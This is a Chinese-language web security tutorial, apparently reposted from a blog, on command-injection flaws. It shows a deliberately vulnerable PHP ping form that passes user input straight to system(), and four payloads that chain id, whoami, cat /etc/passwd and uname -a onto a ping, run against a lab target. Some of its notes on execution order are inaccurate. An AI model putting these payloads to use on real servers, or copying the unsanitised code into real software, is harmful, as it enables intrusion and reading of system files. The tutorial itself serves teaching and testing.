92.网络安全渗透测试—[常规漏洞挖掘与利用篇8]—[命令执行漏洞与测试]

本文阅读 1 分钟
首页 代码,C/C#/C++ 正文

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

一、命令执行漏洞与测试

1、漏洞概念

       在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。

2、漏洞测试

(1)php源码

<html>
    <head>
        <meta charset="UTF-8"/>
        <title>命令执行</title>
    </head>
    <body>
        <form method='post'>
            请输入你的ping的ip:<br />
            <input type='text' name='ip' />
            <input type='submit' value='提交' />
        </form>
    </body>
    
    <?php 
        if($_POST['ip']){ 
            echo system('ping '.$_POST['ip']);
        }
    ?>
</html>

(2)ping命令

img img

(3)命令连接符

(3)测试示例

【靶机链接】【http://www.webtester.com/exec/exec01.php

img

payload-1:127.0.0.1 -c 3 & id img

payload-2:127.0.0.1 -c 3 && whoami img

payload-3:127.0.0.1 -c 3 | cat /etc/passwd img

payload-4:127.0.0.1 -c 3 || uname -a

img

(4)payload总结

1.ping 127.0.0.1 -c 3 & id
//先执行id,后执行ping

2.ping 127.0.0.1 -c 3 && whoami
//先执行ping,后执行whoami

3.ping 127.0.0.1 -c 3 | cat /etc/passwd
//只执行cat

4.ping 127.0.0.1 -c 3 || uname -a
//只执行ping

5.对于逻辑与:执行顺序是一后二前

6.对于逻辑或:执行的是一后二前
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/122769994
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复